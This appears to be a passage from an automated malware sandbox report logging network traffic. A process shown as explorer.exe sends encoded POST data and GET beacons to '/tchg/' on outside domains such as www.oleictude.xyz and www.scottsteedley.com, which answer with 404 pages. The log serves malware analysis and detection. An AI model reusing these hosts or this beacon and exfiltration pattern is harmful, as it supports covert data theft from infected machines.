76 6d 62 75 57 76 31 30 6e 33 2d 39 4c 4f 5f 68 52 6b 39 59 70 72 54 5a 44 49 41 73 2d 5a 6a 4e 6e 64 4e 66 42 63 4e 6e 43 64 48 50 72 7e 77 49 32 44 49 52 58 4f 67 34 4d 49 69 6f 74 35 43 6a 43 76 46 44 31 70 43 47 74 51 42 42 69 64 7a 61 68 6a 4c 4f 43 78 62 76 41 55 45 76 7a 45 4d 58 4c 73 69 64 59 59 35 45 65 7e 35 35 66 52 55 38 37 6b 4e 61 5a 4c 6b 6c 4a 34 39 48 50 37 4d 53 74 77 49 6a 4f 79 4e 47 35 62 41 6a 79 69 43 76 39 6c 41 49 70 44 43 68 54 71 5a 6d 78 62 63 51 76 4c 73 38 50 35 63 4f 6d 7a 6e 4b 35 62 6f 76 50 7e 54 38 38 4d 35 4c 66 65 63 28 78 28 6c 66 7a 77 67 74 73 47 37 30 31 77 4c 71 71 36 78 63 70 33 4c 54 5f 6e 4d 38 33 4f 30 5a 61 61 58 67 37 52 54 7a 4d 74 65 53 59 6b 46 66 57 66 2d 4d 54 30 44 30 37 61 76 66 39 33 4f 37 41 6b 67 70 63 71 77 4a 6f 77 62 32 62 72 68 7a 56 75 32 70 73 76 6d 50 72 67 63 44 49 4b 50 50 35 70 38 35 6e 35 77 68 68 63 63 73 70 56 30 67 45 70 7a 6f 64 36 53 76 76 53 30 48 53 4a 2d 33 34 57 58 4f 5a 50 6d 69 33 35 32 64 30 71 6d 37 34 35 53 54 65 44 7a 28 6a 4c 65 5a 34 59 6c 57 36 78 44 41 67 59 66 64 6a 72 5a 51 31 7e 59 71 61 66 55 62 41 62 30 4b 62 63 67 6e 70 33 45 67 39 50 63 79 70 37 48 49 4b 57 46 66 70 41 61 7a 5f 41 6d 44 6d 78 66 38 6b 69 47 75 37 6a 4a 79 58 62 63 72 75 44 46 47 31 66 4a 48 42 32 7a 65 71 73 43 75 38 77 56 72 54 7a 75 7e 58 50 62 6a 30 6e 72 72 66 77 56 75 41 4c 4a 30 6f 37 66 7a 43 6f 5a 55 6c 7a 6a 57 66 44 33 4d 48 6b 48 6a 6d 59 57 45 7a 4e 4c 70 69 7e 6e 4e 6e 58 32 42 51 55 4d 71 58 7e 49 4f 39 64 6e 28 65 39 64 62 37 53 66 50 44 33 31 4a 75 47 53 50 73 6f 57 68 5f 69 6d 55 32 46 34 79 36 55 4e 67 4b 51 6e 6f 45 37 63 47 72 4d 37 76 38 55 7a 54 51 53 37 36 71 73 4d 6f 4f 72 2d 63 62 66 30 4f 4b 78 44 4e 2d 66 67 71 36 4f 4e 6d 52 47 6c 73 6e 44 41 63 44 57 5a 61 64 56 35 6c 6c 28 42 39 37 6f 63 45 62 53 76 74 5f 4f 62 4d 66 34 6d 6c 37 41 54 28 68 4d 4b 65 36 67 37 57 33 57 4a 37 36 34 4c 6f 65 6c 53 7e 74 47 6c 7e 46 51 6c 36 59 57 30 48 47 50 64 71 65 6b 68 73 79 56 66 50 64 6e 55 28 48 38 38 47 5f 50 32 37 65 54 65 72 5f 65 33 4b 53 31 6a 4b 4e 7a 46 75 72 73 41 53 63 65 61 31 46 37 5f 61 78 4c 5f 65 79 77 6b 58 70 51 74 66 62 49 55 36 47 61 58 35 78 79 62 43 47 7e 53 6d 75 7a 41 43 38 78 6b 37 67 66 70 76 79 6f 54 52 58 5a 77 50 5a 64 52 6f 5a 36 6b 4f 62 46 79 54 77 69 52 49 66 51 79 4d 4e 4f 56 47 6a 28 30 39 4d 65 7a 68 35 34 75 75 39 56 57 4a 55 7e 65 43 59 67 32 48 62 28 5f 5a 76 30 39 6d 5a 46 6b 52 64 38 61 7a 6c 4b 52 48 4c 6f 54 7a 48 47 31 51 4c 78 44 72 30 69 6b 41 65 6a 2d 4b 66 4f 6a 6b 43 78 58 75 4d 44 62 7a 4a 72 51 44 37 66 77 57 34 76 67 38 35 58 44 73 36 6a 70 6f 2d 79 43 42 70 39 58 48 39 63 47 74 4d 6c 51 7e 30 4d 61 45 6e 6b 4b 47 78 7a 4b 35 4c 50 36 7e 4d 4e 59 35 63 72 55 6e 74 49 55 38 34 78 53 7a 68 67 57 50 69 63 49 56 34 31 73 61 4b 59 6c 41 51 47 64 48 33 48 53 45 4f 6e 47 51 68 70 31 30
                                                                                                                    Data Ascii: O0qEM=g0FTPRx1SbxgNLI8VJmsfParj1xP1rBkakXowqYsutjS~lzlo7IbcuZStRbOuOdfMU0W9LqeaI2sy2G98icUhf~6QoetKdQkL6FCoU6ISC6g4hGviVVlJssB2OMd3m08sbdkGssrBH(0wQ41NEejm9kkTU1PqIQqk8wqFIZdP5PjTCbsEGSPBbZa9t4bstm7g7Kuh7GUlS(lVhKoIj1lbXioBqWeC0GwugBmUW6HrH9RG3wC(FOmXa6zuW40Ofof1jSujcqz1KU7jO(ap_p-kJCrBCyMGylx4wfJekAsbvNiTqyMbOkI7MQqIX9Vzj2agOo44Ou8X0IS~ApB5PcjtdqeYQNDlOYtFNYiXp9bna7GEbEIoWsl7LX8Rnp5PrZ7x79kg2(CuA6PPb2vRvng7vmbuWv10n3-9LO_hRk9YprTZDIAs-ZjNndNfBcNnCdHPr~wI2DIRXOg4MIiot5CjCvFD1pCGtQBBidzahjLOCxbvAUEvzEMXLsidYY5Ee~55fRU87kNaZLklJ49HP7MStwIjOyNG5bAjyiCv9lAIpDChTqZmxbcQvLs8P5cOmznK5bovP~T88M5Lfec(x(lfzwgtsG701wLqq6xcp3LT_nM83O0ZaaXg7RTzMteSYkFfWf-MT0D07avf93O7AkgpcqwJowb2brhzVu2psvmPrgcDIKPP5p85n5whhccspV0gEpzod6SvvS0HSJ-34WXOZPmi352d0qm745STeDz(jLeZ4YlW6xDAgYfdjrZQ1~YqafUbAb0Kbcgnp3Eg9Pcyp7HIKWFfpAaz_AmDmxf8kiGu7jJyXbcruDFG1fJHB2zeqsCu8wVrTzu~XPbj0nrrfwVuALJ0o7fzCoZUlzjWfD3MHkHjmYWEzNLpi~nNnX2BQUMqX~IO9dn(e9db7SfPD31JuGSPsoWh_imU2F4y6UNgKQnoE7cGrM7v8UzTQS76qsMoOr-cbf0OKxDN-fgq6ONmRGlsnDAcDWZadV5ll(B97ocEbSvt_ObMf4ml7AT(hMKe6g7W3WJ764LoelS~tGl~FQl6YW0HGPdqekhsyVfPdnU(H88G_P27eTer_e3KS1jKNzFursAScea1F7_axL_eywkXpQtfbIU6GaX5xybCG~SmuzAC8xk7gfpvyoTRXZwPZdRoZ6kObFyTwiRIfQyMNOVGj(09Mezh54uu9VWJU~eCYg2Hb(_Zv09mZFkRd8azlKRHLoTzHG1QLxDr0ikAej-KfOjkCxXuMDbzJrQD7fwW4vg85XDs6jpo-yCBp9XH9cGtMlQ~0MaEnkKGxzK5LP6~MNY5crUntIU84xSzhgWPicIV41saKYlAQGdH3HSEOnGQhp10in5IQQg~kw4FHTXquBrxMVFRh8noM3A2LhNg75mOWTEN8Tk59sYQ8os8oupWaWPPjBIcOzK9Nlp2TVOHZFjiwHxZhZh5-anzNnb9TQrF_j3o4IbZ8(OlzERjubmhaATW_kyyzoa(4pfi0jXbOJwxkMhpl26dy6rsqbTr-AjtHmTG3VIFP7d8RJDICO1eRkztLaX6gUcIktmoXxBrGUovzY0p7v4vDfJsuaFgd6dA4uwzDPWCB1JLvrsfPhshLCQRJjQsx04D9gKAPSAKIrEtKWRa3sNpHHaXT07jEZhoQ9PfnPGy9c8jpeNbVmEeczF0QOFvEp5kQEUlX(uA-MHF6qFhodndP9B~PbjKl56lhiTH8setDX096PqsIeSGMGWoEsteXZhri3etAtFbUP26QRGWYJtu69WSE6AhYdH16Njyz1E1erO5L4CRw9ntfboSSv2xzLAehlQyQtgZRmJLfRGtYj4LimBFY5Liw4aUDGbH-6PaLuAN5GHFV(I(78Y5gy-y_RsLfGQKd6IprhvyVPUTFAGcj(zn2D3bRqa~pe21Q28f2Hh8xr6lgyuc-suhwe2IHZv7vbTNMcomIhWxnayGwxCKwsPb7KLr3u2UC7sAJut0Ajh5kM_sh3emTE7qeLBO6KmWh0Pk-REFYWA(WkbEOUa6yLAD_QSanvEEfm9T7C_oyPfQIdRpECKFUmdUT~iddK6t8CN6ClzQCLFJ4mvQJornuqWuYTjOmuTyuoviuKp1rcRxsdOxOUWR5M2kY7NgcQTc6QCGLQP5bBKwDBks1QSjOOvd8dqUK3q~w4_US8ZqSawOLJXYvFLZr39oHiOyA6JwSRvvL80ZyGOeWwOj7CxQxvL85aEsKXUTEsfuoZXOOvWS1v_swPatdI_LC0dr02qEpvurFFhlnc6up6CW0Ive15HtcXDJNLCf0u62ba23mapHkO3gPWSJRkUOaTe5UfZRUDGFRUwWXgGr0YD8KArblNyC_zhYhfxLMMpbYO3UbmJPmVVkTITgP4ezD1Ylz6asPf07K(LaiHqNsjtTzp6Uic5TlNZNm4vKl5SU-~zejw7A9YR6XvDl06mK4xN3U5CcnN1(1THDx5cXfikfLtGfhMv9TZopiaZDyc9RUvv(vplciFEku366sCS5hqBGpfg~HzXomXisO9VrBOaZZhlRPj3xlpz2xYQJ48js9nFhxZViEUHyd29Jy(zmGZxf5903glKoba1km9IAR15Bg9iUHK5vzxlHHihjE(S9t(j8rVDveAQJWJe~27AilTPXeoiRToL8WHwODtFZCgGnz60EMsblru2p6DdPrVlsFSm9gq8KLYzG0Ni75WfM2CR3CqlUM9ePfLr4Qem5M90XhOvqC9kRpCmdGWSGRPNHPQ7~qSmTwuIGde6pYngtJAtECVqtt1ynMFwpQAwLRWkLbkQPOVg(eyr7TJWpnw2X2xTMlIgoDkMH7R0tyxDFsvXCEYeViE5HVAurFqzo8TtHG7hSdMyMScnFxqkeuByePsdRulNjvwABI46HKmXbnCrRBWrnOx0sT6fZUYOAjMYq4AoiyEIGbYVyFXVpHreTu2lBMvjxgYpR9Q863Mgy-45u56pLwrAQ1XGRSzIzBwCb-DYJiaA2vq-getFXiyqCGp7Q0~cQXwDp2JppQamAB1aHIA7cKk17ezTur1_tEPTToKwWDv4NtlTKaDqqHRTJ6o7ZxRqDOWP8OPj8MomFCoSmXpENxHTN9KTLSHRiacqifTUa29xdkkcWf3uQHyyQJ0N0WMy26YEz7UrDArmZ8nceRgk9MHkgO3xc7SMZGplikHgnQn8mQCQ3VPEwUUBffmu1DPW3EWx9rSaysKk1FpnRcvo2O(zlZJHAX(czHOurRT7Ryr3yeAx99cuTn7ZBkpuh2Pi6vZYtpjY4zltcqSM7Q(IPL2C(MEiXTZQU8JKc6Mkm7XD0KTNfUVZeM0UvKpmkRHkhqGj9NHJYfSM7ddK0_UsVzAZIg9sgiOnng7FTXndISl1kl4xdftQIAoe6hTdp9irX1SjCtUHxUa5C5nGIhfB87sj(9P_w58Sgc6ddv9w6UWALPQ3VJBz0r6tukSsVuw5ma5f(t3DCZtW9vQakDEmEXpf4ajLq0yo60mdDBqMVYhbXNWz3pKeT4MDmlaN9bp-YZ1gs5YI2cpklSczq2n3TsrajdFVJx4XXYUhco7CLS2nxhwcFjyltgq_8GLSRZL497TCdZx3szh7diDxVeclAk4bMK2iQ68_i4StZ8AE0r(1TAovcEOnbICJd-m-fozGgN85f0n2Xh3iPNLvwfHahv5NdDxatojjaGYlis~AQDmArToa9VKwYQYAEwe5W5921b1ei0wo8rG-Fnblzf0DjYrHmA1M92iALBTPmq6a7c5Mcri09RgMEFD3O_DS61elrKcZDUuP0Ns74MXmygXS5JpgB7ggq1H6dGMtQxwq(fVoWV(AcuDmA0tXcPFbk4YpahAXTMzWz_chgQqSwR(YSMelCjWiwFKuikCQJZy2hUJQnstN(2MGUhEUebzdw9pcK5M6fXwhfggst0EzxdPoW1f9JXt95RGr9M867Ap2unIwQ61ezlBx~izCd7pC2ylmZReIYJYSLNcWOaxtHM(kHQjVUBKQMPn1KogkWy04kJLrmx1rEj(1WIBXpJPhAVm9613GAOUXKsR42ofkVIpwOBXuj5iaF3brfwmvPTI9IbDCHxsy
                                                                                                                    May 30, 2023 11:13:43.800802946 CEST1845OUTData Raw: 73 77 66 78 44 6a 59 65 6e 79 6a 6b 67 50 69 39 6f 7e 35 31 61 39 59 65 4a 6e 4c 61 72 6f 6e 67 53 78 2d 68 79 71 4b 36 53 4c 76 47 4e 4a 38 51 64 77 49 51 64 4e 54 68 5f 31 56 38 58 33 65 37 6d 47 39 6f 47 42 63 56 34 49 55 35 6d 4e 4b 43 4a 51
                                                                                                                    Data Ascii: swfxDjYenyjkgPi9o~51a9YeJnLarongSx-hyqK6SLvGNJ8QdwIQdNTh_1V8X3e7mG9oGBcV4IU5mNKCJQwmif52tRDF6ssM49UHOnVcvqAnQE60ukxocHlECyLk3mxvrYjXSXUJRcKM3XUphs7u440d-sYaUDelp9g4PS3O1LzXh37WQS5DgyFgAJyqS4kcXf_PgE-7-VDZMJ5UQUeo0Orq2tfrOygI1LdF-bTu1GK46Wyfv5n
                                                                                                                    May 30, 2023 11:13:43.800889015 CEST1854OUTData Raw: 78 79 44 35 74 4f 33 46 35 6b 48 4c 73 52 51 49 6f 45 4a 32 6c 64 4e 66 42 33 79 31 65 63 70 69 74 6c 58 39 37 72 35 5a 33 76 39 59 50 4f 73 4f 46 6f 68 45 49 59 65 6c 73 6b 59 66 31 76 63 4a 4c 56 6b 53 63 51 76 6c 56 61 58 49 36 28 43 52 6b 36
                                                                                                                    Data Ascii: xyD5tO3F5kHLsRQIoEJ2ldNfB3y1ecpitlX97r5Z3v9YPOsOFohEIYelskYf1vcJLVkScQvlVaXI6(CRk6EYIYJQKYe4Me2WegUDyfQBbs6vdWFVxo0LScP6uj8MLLUEXIdZmSYYc0Dt-vgTh6bWX4ap8JJUjxFSeoxNN9cnuMg00bdTeszLFKKYQxeLrQr0yuZGFffVYelycd3Sjn3vgOKdq095CWh~2JdYQZJI45Z0L0jNFei
                                                                                                                    May 30, 2023 11:13:43.801237106 CEST1860OUTData Raw: 48 79 72 41 53 61 45 50 45 6a 33 6d 67 6d 57 37 5a 63 6f 30 71 32 64 6d 55 50 53 54 51 46 36 51 72 37 37 62 71 36 61 73 36 65 69 4b 47 68 4e 31 41 6f 34 65 57 48 61 48 39 31 6b 4f 39 7e 39 57 65 4f 4f 54 62 73 73 43 56 7a 38 56 68 65 49 57 42 68
                                                                                                                    Data Ascii: HyrASaEPEj3mgmW7Zco0q2dmUPSTQF6Qr77bq6as6eiKGhN1Ao4eWHaH91kO9~9WeOOTbssCVz8VheIWBh4HK7sEMmtSxVYJPYRZyoYGGjw1NSMIVo9WlPgyZ(kub4GFYCUXjUCJjYAH9nBeS8MK4Pc5hhyw0P2j1vlwR1WiMuo1-mWjtNvAZ4ckZ8DHlfXywhacIMm0ZriOl9jNMtdaZFXz3pXPxO22hrtBuDooaNJepe2c8ks
                                                                                                                    May 30, 2023 11:13:43.801438093 CEST1864OUTData Raw: 4f 42 6b 6b 70 4e 39 4a 43 37 72 39 58 4e 64 53 65 4c 70 71 42 54 32 52 4c 58 6c 4e 4c 70 30 4a 6e 4c 59 35 62 53 36 4b 51 77 62 54 54 31 56 43 71 69 65 4c 69 30 6c 4d 5a 68 76 49 4d 41 4b 44 51 54 46 4f 6d 74 42 38 32 4f 5a 53 45 51 59 35 67 68
                                                                                                                    Data Ascii: OBkkpN9JC7r9XNdSeLpqBT2RLXlNLp0JnLY5bS6KQwbTT1VCqieLi0lMZhvIMAKDQTFOmtB82OZSEQY5ghVpW8pvraRQSVT0j8aTFjhfjCyPYtCAsa-FgBRkufDLKrsm5uRo5mAgIokiRGtxtZc8U2WlIoeFO16FqEZoZGWg9RI7GqOXV7S3xKOz26yIHYnaIExc2RJC6oGFbnmqhKcKwbjgbCQsX1OetqEYPDPWM~ZW66O3Cg-
                                                                                                                    May 30, 2023 11:13:43.827404022 CEST1864INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:43 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                                                                                                                    May 30, 2023 11:13:43.876643896 CEST1871OUTData Raw: 45 39 74 51 39 34 47 65 61 55 4b 5a 39 43 6b 66 45 74 7a 69 56 38 51 50 57 52 54 66 44 37 49 58 70 42 4a 30 61 62 5f 4c 77 4c 78 73 68 6b 66 4d 31 32 48 70 74 53 4f 41 79 75 6d 67 30 4c 6b 73 6c 72 77 74 78 62 31 51 77 35 56 50 71 6a 39 7a 44 4f
                                                                                                                    Data Ascii: E9tQ94GeaUKZ9CkfEtziV8QPWRTfD7IXpBJ0ab_LwLxshkfM12HptSOAyumg0Lkslrwtxb1Qw5VPqj9zDOhpM5Oe2KI1L~uedv-4TO-cCaUTG5Q~S45F2M9Kr09zc9eklEJHuqZSrPo3ZqQJYxrtN8gJZQ24ijtdtutZDOHcEzgMu7fs1(JjGuKGoVae3Bp7OX-enOTlrnm1rRO(x~k651E~zamWUIZ77Zs~yFGpuOqh31JCzod
                                                                                                                    May 30, 2023 11:13:43.876770020 CEST1878OUTData Raw: 67 55 7a 30 48 77 44 66 65 38 37 69 61 33 54 54 56 4a 2d 28 45 78 4a 70 74 79 4d 67 71 41 4f 55 6e 65 41 34 6a 61 70 64 66 65 34 78 65 71 6b 58 44 67 6a 35 46 4a 66 74 74 28 7a 61 6f 78 50 62 49 4c 78 28 36 54 43 38 65 4a 6e 34 4b 50 63 41 35 32
                                                                                                                    Data Ascii: gUz0HwDfe87ia3TTVJ-(ExJptyMgqAOUneA4japdfe4xeqkXDgj5FJftt(zaoxPbILx(6TC8eJn4KPcA52qLftZxVBPAYtqAETPjbOAgHsqOtp39QjL2aDPdZoszjyUHoXMg52oAMWGK33x~ibqSyRc~bYrVVwnG-hnSxGkfKK9q6gZynRfhFvTgSFf2B3iCyZBr2u-lXaBYgrWKixb42tZJWtt1OeRVGSQ01mtGPnTOjhxVFMR


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    103192.168.11.2049862109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:46.334471941 CEST1879OUTGET /tchg/?2ax=jRqfPy4_lz2&O0qEM=t2tzMhBRWo10Eosyb8KFBuaI1V5h8MV7T2bC3+E0nZXV+FHXmJExWsZaqAHQ5axaFjoD9IuPadSp7WKT8CRkiPajdeOXH8cJLw== HTTP/1.1
                                                                                                                    Host: www.oleictude.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:13:46.438244104 CEST1879INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:46 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    104192.168.11.2049863162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:51.609028101 CEST1880OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 31 56 32 70 47 69 61 49 30 63 61 47 35 41 4f 56 47 58 35 68 5a 7a 32 59 41 79 61 6d 59 78 41 35 72 6b 46 79 36 6f 4f 68 4f 65 55 69 43 74 4b 59 4e 6a 4f 63 56 62 58 5f 4f 36 45 38 6f 4f 50 4f 28 33 69 4d 33 6b 6e 74 42 62 53 43 42 4b 55 36 79 34 39 6a 48 31 44 53 66 44 33 49 7a 59 69 4b 77 48 46 4b 47 67 62 46 62 4b 7e 71 49 51 38 58 31 4e 56 47 65 70 72 58 37 4b 76 64 53 39 48 41 69 55 67 48 39 4f 64 67 6b 52 30 39 4e 41 53 6f 58 6a 6c 65 4d 55 58 78 37 30 4d 65 56 6c 59 6d 46 37 50 55 77 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(61V2pGiaI0caG5AOVGX5hZz2YAyamYxA5rkFy6oOhOeUiCtKYNjOcVbX_O6E8oOPO(3iM3kntBbSCBKU6y49jH1DSfD3IzYiKwHFKGgbFbK~qIQ8X1NVGeprX7KvdS9HAiUgH9OdgkR09NASoXjleMUXx70MeVlYmF7PUwg).
                                                                                                                    May 30, 2023 11:13:51.777358055 CEST1881INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:13:50 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:13:51.777434111 CEST1882INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


